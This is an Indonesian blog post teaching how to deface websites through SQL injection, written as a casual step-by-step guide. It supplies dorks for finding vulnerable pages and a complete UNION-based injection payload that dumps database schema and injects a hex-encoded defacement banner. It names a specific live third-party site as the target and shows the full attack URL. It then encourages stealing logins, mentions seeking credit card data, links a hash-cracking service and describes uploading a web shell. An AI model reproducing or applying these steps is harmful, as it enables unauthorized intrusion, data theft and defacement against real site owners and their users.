Cara Deface Teknik SQLi

Assalamualaikum Wr.Wb
Hello Semua Dah Lama Dah Gk Ketemu Gua Orang Ter Ganns Ea Kali Nih Gua Akan Ngasih Tau Cara Deface Teknik SQLi Apa Si Itu SQLi? SQLi Adalah Suatu Cara Teknik Penyerangan Terhadap Website Mungkin Banyak Website Yang Rentan Sekali SQLi Oke Langsung Saja
Apa Aja Yg Di Perlukan
-Dork
-Exploit
-Rokok 1 Bungkus Sama Teh Pucuk 2
-Internet Kalo Gk Ada Internet Gk Usah Mending Jual Hp lu Buat Beli Internet wkwk
-Pacar Kalo Perlu (Kalo Jomblo Diem Aja Udah wkwk)

Dork : inurl:index.php?id=indonesia
inurl:berita?id=
inurl:news_php?id=
(Kembangin Lagi Gan Biar Dapet Yg Vuln)
Exploit : +union+select+1,2,3,4,5,concat(0x3c696d67207372633d2768747470733a2f2f7777772e75706c6f61642e65652f696d6167652f393731343136342f32303139303331345f3036323632362e6a7067273e2c3c62723e2c3c68313e496e6a6563746564204279204d722e4633654c4c2047616e6e732054713c2f68313e2c3c62723e,(select/**/group_concat(table_name,0x3a,column_name,0x3c62723e)/*!50000from*/information_schema.columns/*!12345where*/table_schema=database())),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,23,24,25,26,27,28--+-

Live Target : https://www.panki.it/en/gallery.php?id=139
Mula-Mula Kali Cukup Kasih Tanda ' di Belakang URL nya Seperti Nih : https://www.panki.it/en/gallery.php?id=139'
Kalo Blank Atau Berubah Dan Ada Tulisan Syntac Eror MYSQL Itu Tandanya Vuln

Oke Langsung Exploit Nya Kalian Cukup Masukin Exploit Nya Di Belakang URL Seperti Ini : https://www.panki.it/en/gallery.php?id=139+union+select+1,2,3,4,5,concat(0x3c696d67207372633d2768747470733a2f2f7777772e75706c6f61642e65652f696d6167652f393731343136342f32303139303331345f3036323632362e6a7067273e2c3c62723e2c3c68313e496e6a6563746564204279204d722e4633654c4c2047616e6e732054713c2f68313e2c3c62723e,(select/**/group_concat(table_name,0x3a,column_name,0x3c62723e)/*!50000from*/information_schema.columns/*!12345where*/table_schema=database())),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,23,24,25,26,27,28--+-
Dann Booom Ea Keluar Data Base Nya Mudah Kan hehe Nah Kalian Bisa Pilih Sesuka Hati Kalian Mau Ngambil Username Passwrod Ny apa Kalian Niat Nyari CC wkwk Dosa Woi wkwk Kalo Sudah Dapet Username Sama Password Login Ny Harus Ngapain Gan Kalo Password Nya Masi Di Code Kalian Bisa Hash https://hashkiller.co.uk
Kalo Sudah Dapet Kalian Login Dan Cari Tempat Buat Up Shell Kamu Misal nya Lu Upload Di Gallery https://Targetlu.com/Gallery/NamaShellLu.php
Dan Lain-Lain Buat Tempat Up shell Lu hehe
Oke Cukup Sekian Assalamualaikum Wr.Wb

Komentar

Posting Komentar

Postingan Populer